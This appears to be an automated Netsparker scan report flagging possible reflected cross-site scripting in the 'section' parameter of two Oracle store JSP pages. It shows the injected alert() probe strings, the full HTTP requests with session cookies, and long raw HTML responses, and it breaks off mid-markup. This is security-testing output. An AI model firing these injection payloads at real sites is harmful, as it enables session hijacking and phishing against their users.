href=ibeCZzdMinisites.jsp?language=ZHS&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangZHS.gif" width=56 height=19 alt="简体中文" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=PTB&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangPTB.gif" width=99 height=19 alt="Português do Brasil" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=ESA&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangESA.gif" width=135 height=19 alt="Español Latinoamericano" border=0 ></a><br><br><!--out table for the part between top and bottom--><table summary='' border="0" width="100%" cellspacing="0" cellpadding="0"> <!-- left column ---------------------------------------------------------> <tr> <td valign="top" width="15%" nowrap> </td> <!--spacer between left and middle column--> <td><img src="/OA_MEDIA/jtfutrpx.gif" width="10" alt=""></td> <!-- center column -------------------------------------------------------> <td valign="top" width="70%" class="prompt"> <!-- middle bin 1 & 2--> <!--end of middle bin1&2--> <!--table for group picker--> <table border="0" cellspacing="0" cellpadding="0" width="100%" align="center" summary=""> <tr> <td colspan=10 > <table border="0" cellspacing="0" cellpadding="0" width="100%" summary=""> <tr> <td class="pageTitle" width="100%"> Choose Your Site </td> </tr> </table> </td> <!--end of table for group picker--> </tr><!-- <tr> <td colspan=10 class=OraBGAccentDark><img src="/OA_MEDIA/jtfutrpx.gif" height=1 width=1 alt=""></td> </tr>--> <!--<TR><TD colspan=10 >&nbsp;</TD&g..
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting
4 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0&section=%27..

Parameters

Parameter Type Value
item GET 899068
beginIndex GET 0
section GET '+alert(0x001336)+'
sitex GET 14405:1435532:US

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=%27%2Bnetsparker%280x001336%29%2B%27&sitex=14405:1435532:US HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=899068§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=056dae5c6edba2c25a9819d3c41a65e5df10a7599e99f62afe8de771fc015c9c.e34QbhaLa3mKbi0La3mQaNePax4Oe0; GSI_pses=ZG1DC0E9326A0B493CFE01D5EC45E2CE4D2FC66A5278E45F5D049DF995CFF812515D56D98415E8B5AFD6FFBA2E48002906; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=GXz62Dty94loG15Q0NGWIXETvd
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=056dae5c6edba2c25a9819d3c41a65e5df10a7599e99f62afe8de771fc015c9c.e34QbhaLa3mKbi0La3mQaNePax4Oe0; path=/OA_HTML; secure
Content-Length: 9975
Date: Sun, 11 Sep 2011 18:03:17 GMT
































<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG6BE86E23F7167E5BEFE71FA68C06603C9B5A71930FE3A7C6&appName=IBE&sitex=14405:1435532:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $Header: ibeCCtdItemLeftBins.jsp 120.2 2005/11/16 05:57:01 sv..
- /OA_HTML/ibeCCtpItmDspRte.jsp

/OA_HTML/ibeCCtpItmDspRte.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=925062&section=%27%2Balert(0x001604)..

Parameters

Parameter Type Value
item GET 925062
section GET '+alert(0x001604)+'
beginIndex GET 0
sitex GET 14405:1435532:US
cg GET -200
kw GET 3

Request

GET /OA_HTML/ibeCCtpItmDspRte.jsp?item=925062§ion=%27%2Bnetsparker(0x001604)%2B%27&beginIndex=0&sitex=14405:1435532:US&cg=-200&kw=3 HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=925062§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=b37e009967e94733d76576a22b77c1e814de84a400ff988c88d75ca28069df0e.e34QbhaLa3mKbi0La3mQaNePax4Oe0; GSI_pses=ZG81CBFF006865E71AFC42348F9AA8108B8B76C4CAB6FEF96AE4652EAB9B9925988162ECD6A20696D9224B9F3E86A7B8D4; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=gcFrnhN2jPfrLvs5fv6Zl0DRrq
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=b37e009967e94733d76576a22b77c1e814de84a400ff988c88d75ca28069df0e.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Content-Length: 10280
Date: Sun, 11 Sep 2011 18:05:02 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp






























<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZGD2A1857782EC32FCE8BB5514F3B514E08442E3213932597D&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" 